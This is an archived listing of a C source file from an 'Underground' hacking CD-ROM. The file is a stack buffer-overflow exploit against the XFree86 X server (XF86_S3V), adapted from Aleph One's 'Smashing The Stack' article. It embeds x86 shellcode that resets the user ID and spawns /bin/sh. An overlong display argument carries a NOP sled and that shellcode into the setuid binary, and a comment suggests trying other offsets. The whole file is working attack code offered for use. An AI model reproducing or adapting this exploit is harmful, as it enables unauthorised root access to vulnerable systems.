home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / hack / PDFAQ.ZIP / xwin.c < prev   
Encoding:
C/C++ Source or Header  |  1998-02-02  |  1.4 KB  |  37 lines
  1.     /**********************************************************
  2.     * Adapted from                                            *
  3.     *   "Smashing The Stack For Fun And Profit"               *
  4.     *     in Phrack-49 by Aleph One ( aleph1@underground.org )*
  5.     * by                                                      *
  6.     *   Rahul Sahadevan. ( srahul@csa.iisc.ernet.in )         *
  7.     **********************************************************/
  8.  
  9. /* Try 2 3 4 5 for OFFSET */
  10. #define OFFSET 2
  11.  
  12. #include <string.h>
  13. #include <unistd.h>
  14. #include <errno.h>
  15.  
  16. #define LENCODE ( sizeof( Code ) )
  17. char Code[] =
  18.     "\xeb\x40\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0"
  19.     "\x3f\x89\xc2\x31\xdb\xb3\x0a\x31\xc9\xcd\x80\x89\xd0\x43\x41"
  20.     "\xcd\x80\x89\xd0\x43\x41\xcd\x80\x31\xc0\x89\xc3\xb0\x17\xcd"
  21.     "\x80\x31\xc0\xb0\x2e\xcd\x80\x31\xc0\xb0\x0b\x89\xf3\x8d\x4e"
  22.     "\x08\x8d\x56\x0c\xcd\x80\xe8\xbb\xff\xff\xff/bin/sh";
  23.  
  24. char Display[ 0x4001 + OFFSET ] = ":99999", *ptr = Display + OFFSET + 1;
  25. char *args[] = { "X", "-nolock", Display, NULL };
  26.  
  27. main() {
  28.   dup2( 0, 10 ); dup2( 1, 11 ); dup2( 2, 12 );
  29.   __asm__("movl %%esp,(%0)\n\tsubl %1,(%0)"::"b"(ptr),"n"(LENCODE+0x2000));
  30.   memcpy( ptr + 4, ptr, 0x3fc );
  31.   memset( ptr + 0x400, 0x90, 0x3c00 - LENCODE );
  32.   memcpy( ptr + 0x4000 - LENCODE, Code, LENCODE );
  33.   execve( "/usr/X11R6/bin/XF86_S3V", args, args + 3 );
  34.   perror( "execve" );
  35. }
  36.  
  37.